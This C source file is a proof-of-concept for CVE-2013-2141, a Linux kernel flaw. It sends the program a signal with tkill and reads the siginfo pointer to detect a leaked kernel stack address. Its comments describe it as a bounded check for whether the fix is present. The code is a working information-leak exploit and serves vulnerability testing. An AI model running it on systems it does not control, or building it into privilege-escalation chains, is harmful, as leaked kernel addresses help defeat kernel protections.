Kernel Stack Leak: CVE-2013-2141
#define _GNU_SOURCE     /* siginfo_t, SA_SIGINFO and syscall() under -std=c11 */
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
/*
CVE-2013-2141
http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=b9e146d8eb3b9ecae5086d373b50fa0c1f3e7f0f
*/
/* Value captured by sig_handler(); stays NULL until a SIGUSR1 has been handled. */
void * kernel_stack_address = NULL;

/*
 * SA_SIGINFO handler for SIGUSR1: copies si_ptr out of the delivered
 * siginfo into kernel_stack_address so the probing loop can examine it.
 * Per the commit referenced above, a self-directed tkill() on an
 * unpatched kernel leaves that field holding stale kernel stack data.
 * sig and ctx are not used.
 */
static void sig_handler(int sig, siginfo_t *siginfo, void *ctx)
{
    (void)sig;
    (void)ctx;
    kernel_stack_address = siginfo->si_ptr;
}
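/*
 * Probe whether the running kernel leaks a kernel-range pointer through
 * the siginfo of a self-directed tkill() (CVE-2013-2141, see the commit
 * referenced above).
 *
 * Installs a SA_SIGINFO handler for SIGUSR1 once, sends the signal to the
 * calling thread with tkill(2) and inspects the si_ptr the handler
 * recorded. The probe is bounded to MAX_PROBES rounds: a fixed kernel
 * zero-fills the siginfo, so the original unbounded loop never returned
 * on a patched system.
 *
 * Returns the recorded value when it lies at or above KERNEL_ADDR_MIN;
 * NULL when sigaction()/tkill() fail (errno reported via perror) or when
 * no such value was seen. KERNEL_ADDR_MIN assumes a 32-bit x86 3G/1G
 * split (kernel mapped from 0xC0000000); on other layouts the comparison
 * is only a heuristic — TODO confirm for the target architecture.
 */
void * getKernelStackAddress(){
    enum { MAX_PROBES = 8 };
    const uintptr_t KERNEL_ADDR_MIN = 0xBF000000u;   /* just below the 0xC0000000 split */

    struct sigaction act = {
        .sa_sigaction = &sig_handler,
        .sa_flags = SA_SIGINFO
    };
    if (sigaction(SIGUSR1, &act, NULL) < 0) {
        perror("sigaction");
        return NULL;   /* the original returned the int 1 from a pointer-returning function */
    }

    for (int probe = 0; probe < MAX_PROBES; probe++) {
        if ((uintptr_t)kernel_stack_address >= KERNEL_ADDR_MIN) {
            break;
        }
        /* tkill(2) has no libc wrapper and gettid(2) only gained one in glibc 2.30. */
        if (syscall(SYS_tkill, (pid_t)syscall(SYS_gettid), SIGUSR1) < 0) {
            perror("tkill");
            return NULL;
        }
        sleep(2);   /* let the signal be delivered and handled before re-checking */
    }

    if ((uintptr_t)kernel_stack_address < KERNEL_ADDR_MIN) {
        return NULL;   /* nothing in kernel range observed: the fix appears to be present */
    }
    printf("kstack : %p\n", kernel_stack_address);
    return kernel_stack_address;
}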
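/*
 * Entry point: run the CVE-2013-2141 probe once and report the outcome.
 *
 * Returns 0 when getKernelStackAddress() observed a kernel-range pointer
 * (the kernel leaked it) and 1 otherwise. argc/argv are unused. The
 * original carried a commented-out line masking the address down to its
 * thread_info page; that step is deliberately not performed here — the
 * program only reports whether the fix is present.
 */
int main (int argc, char *argv[])
{
    (void)argc;
    (void)argv;

    void *possKernelStackAddr = getKernelStackAddress();
    if (possKernelStackAddr == NULL) {
        puts("no kernel stack address observed (sigaction/tkill failed or kernel is fixed)");
        return 1;
    }
    return 0;
}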